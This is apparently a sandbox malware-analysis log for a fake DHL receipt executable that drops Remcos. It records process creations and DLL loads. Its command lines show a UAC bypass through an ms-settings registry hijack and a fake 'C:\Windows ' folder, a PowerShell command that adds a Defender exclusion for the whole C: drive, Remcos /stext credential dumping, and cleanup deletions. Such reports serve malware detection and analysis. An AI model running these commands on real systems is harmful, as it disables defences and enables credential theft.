              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Process created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF
              Source: C:\Users\Public\Libraries\yfkwifxL.pif | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\xkn.exe | Process created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exe | Process created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"
              Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"
              Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: unknown | Process created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
              Source: C:\Users\Public\alpha.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
              Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: archiveint.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: url.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: ieframe.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: netapi32.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: wkscli.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe | Section loaded: amsi.dll
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mssip32.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
